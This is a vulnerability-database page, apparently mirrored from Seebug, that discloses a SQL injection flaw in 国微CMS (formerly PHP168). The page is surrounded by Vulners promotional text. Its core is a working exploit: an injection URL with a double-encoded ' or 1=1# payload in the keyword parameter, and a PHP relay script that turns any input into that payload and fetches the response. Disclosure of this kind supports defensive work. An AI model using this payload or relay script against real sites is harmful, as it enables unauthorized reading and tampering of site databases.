Lucene search
K

国微CMS(原PHP168) SQL 注入漏洞

🗓️ 29 Sep 2015 00:00:00Reported by 吾 非Type 
seebug
 seebug
🔗 www.seebug.org👁 1035 Views

国微CMS(原PHP168) SQL注入漏

Code

                                                
漏洞地址    http://localhost/gh//index.php/ask/item-confirm-category-8.html?keyword=1%%2527%20or%201=1%23

因为要编码就写了个中转脚本  本地注入方便利用

<?php 
$x=$_GET[x];
$x=" or 2="."$x"."#";
$s=urlencode(rawurlencode($x));

$result = @file_get_contents("http://localhost/gh//index.php/ask/item-confirm-category-8.html?keyword=1%%25%32%

37".$s."");

echo $result ;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Sep 2015 00:00Current
7.1High risk
Vulners AI Score7.1
1035